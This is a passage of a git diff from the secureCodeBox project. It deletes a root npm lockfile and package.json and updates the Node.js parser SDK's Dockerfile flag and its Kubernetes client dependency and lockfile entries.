"sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "sshpk": { - "version": "1.18.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", - "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - }, - "dependencies": { - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - } - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "table": { - "version": "6.7.1", - "resolved": "https://registry.npmjs.org/table/-/table-6.7.1.tgz", - "integrity": "sha512-ZGum47Yi6KOOFDE8m223td53ath2enHcYLgOCjGr5ngu8bdIARQk6mN/wRMv4yMRcHnCSnHbCEha4sobQx5yWg==", - "dev": true, - "peer": true, - "requires": { - "ajv": "^8.0.1", - "lodash.clonedeep": "^4.5.0", - "lodash.truncate": "^4.4.2", - "slice-ansi": "^4.0.0", - "string-width": "^4.2.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "ajv": { - "version": "8.6.2", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.6.2.tgz", - "integrity": "sha512-9807RlWAgT564wT+DjeyU5OFMPjmzxVobvDFmNAhY+5zD6A2ly3jDp6sgnfyDtlIQ+7H97oc/DGCzzfu9rjw9w==", - "dev": true, - "peer": true, - "requires": { - "fast-deep-equal": "^3.1.1", - "json-schema-traverse": "^1.0.0", - "require-from-string": "^2.0.2", - "uri-js": "^4.2.2" - } - }, - "json-schema-traverse": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", - "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", - "dev": true, - "peer": true - } - } - }, - "tar": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.1.0.tgz", - "integrity": "sha512-ENhg4W6BmjYxl8GTaE7/h99f0aXiSWv4kikRZ9n2/JRxypZniE84ILZqimAhxxX7Zb8Px6pFdheW3EeHfhnXQQ==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.0", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "dependencies": { - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha1-f17oI66AUgfACvLfSoTsP8+lcLQ=", - "dev": true, - "peer": true - }, - "throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "requires": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - } - }, - "tslib": { - "version": "2.6.2", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz", - "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true - }, - "typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true - }, - "undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.13", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.13.tgz", - "integrity": "sha512-xebP81SNcPuNpPP3uzeW1NYXxI3rxyJzF3pD6sH4jE7o/IX+WtSpwnVU+qIsDPyk0d3hmFQ7mjqc6AtV604hbg==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-compile-cache": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/v8-compile-cache/-/v8-compile-cache-2.3.0.tgz", - "integrity": "sha512-l8lCEmLcLYZh4nbunNZvQCJc5pv7+RCwa8q/LdUx8u7lsWvPDKmpodJAJNwkAhJC//dFY48KuIEmjtd4RViDrA==", - "dev": true, - "peer": true - }, - "v8-to-istanbul": { - "version": "9.2.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.2.0.tgz", - "integrity": "sha512-/EH/sDgxU2eGxajKdwLCDmQ4FWq+kpi3uCmBGpw1xJtnAxEjlD8j8PEiGWpCIMIs3ciNAgH0d3TTJiUkYzyZjA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } - }, - "word-wrap": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.4.tgz", - "integrity": "sha512-2V81OA4ugVo5pRo46hAoD2ivUJx8jXmWXfUkY4KFNw0hEptvN0QfH3K4nHiwzGeKl5rFKedV48QVoqYavy4YpA==", - "dev": true, - "peer": true - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/package-lock.json.license b/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/package.json b/package.json deleted file mode 100644 index eb8b46cf3b..0000000000 --- a/package.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "name": "@securecodebox/securecodebox", - "version": "1.0.1", - "description": "", - "homepage": "https://github.com/secureCodeBox/secureCodeBox#readme", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "index.js", - "scripts": { - "test": "jest" - }, - "keywords": [ - "secureCodeBox", - "security" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Jannik Hollenbach", - "url": "https://github.com/J12934" - }, - { - "name": "Robert Seedorff", - "url": "https://github.com/rseedorff" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "devDependencies": { - "@types/jest": "^29.5.14", - "@types/node": "^22.10.2", - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1", - "prettier": "^3.4.2", - "ts-jest": "^29.2.5", - "typescript": "^5.7.2" - }, - "jest": { - "projects": [ - "/scanners/", - "/hooks/" - ] - }, - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - } -} diff --git a/package.json.license b/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/parser-sdk/nodejs/Dockerfile b/parser-sdk/nodejs/Dockerfile index 4dab56012c..bd9bae86a6 100644 --- a/parser-sdk/nodejs/Dockerfile +++ b/parser-sdk/nodejs/Dockerfile @@ -5,7 +5,7 @@ FROM node:22-alpine AS build WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine ARG NODE_ENV diff --git a/parser-sdk/nodejs/package-lock.json b/parser-sdk/nodejs/package-lock.json index ca6ddfa631..79c255946a 100644 --- a/parser-sdk/nodejs/package-lock.json +++ b/parser-sdk/nodejs/package-lock.json @@ -9,46 +9,18 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.9", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" - } - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" + "jsonpointer": "^5.0.1" } }, "node_modules/@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -60,6 +32,7 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -68,32 +41,70 @@ } }, "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "license": "Apache-2.0", "dependencies": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, + "node_modules/@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", + "license": "MIT" + }, + "node_modules/@types/node": { + "version": "22.10.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", + "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", + "license": "MIT", + "dependencies": { + "undici-types": "~6.20.0" + } + }, + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "license": "MIT", + "dependencies": { + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", "engines": { - "node": ">=14" + "node": ">= 14" } }, "node_modules/ajv": { @@ -140,148 +151,94 @@ } } }, - "node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": 